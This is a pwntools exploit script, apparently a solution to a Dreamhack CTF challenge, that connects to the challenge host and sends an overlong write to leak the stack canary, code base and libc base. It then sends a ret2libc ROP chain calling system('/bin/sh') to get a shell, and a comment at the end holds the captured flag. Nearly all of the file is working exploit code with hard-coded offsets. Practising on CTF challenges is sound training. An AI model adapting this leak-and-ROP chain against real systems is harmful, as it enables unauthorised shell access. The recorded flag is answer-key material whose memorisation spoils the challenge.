from pwn import *

e = ELF("./prob_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

script = '''
b *run
b *run+323
'''

p = remote("host1.dreamhack.games", 22879)
#p = remote("0", 8080)
#p = gdb.debug("./prob_patched", gdbscript =  script)

p.sendafter(b"> ", b"2.")
payload = b"A" * 0x100
p.sendafter(b"Write: .\n", payload)

p.sendafter(b"> ", b"1.")
p.recvuntil(payload)
p.recv(8)
canary = u64(p.recv(8))
print(hex(canary))
p.recv(8)
code_base = u64(p.recv(8)) - 0x14d9
print(hex(code_base))
p.recv(8)
libc_base = u64(p.recv(8)) - 0x29d90
print(hex(libc_base))

pop_rdi = libc_base + 0x000000000002a3e5
ret = pop_rdi + 1
binsh = libc_base + list(libc.search("/bin/sh\x00"))[0]
system = libc_base + libc.symbols['system']

payload = b"A" * 0x18 + p64(canary)
payload += p64(0) + p64(pop_rdi)
payload += p64(binsh) + p64(ret)
payload += p64(system)
payload += b"."

p.sendafter(b"> ", payload)

p.interactive()
#DH{ef1293304febbec4353e3623eb998a2f316e1ed8fe52242f8f4a5172d02cbbc2}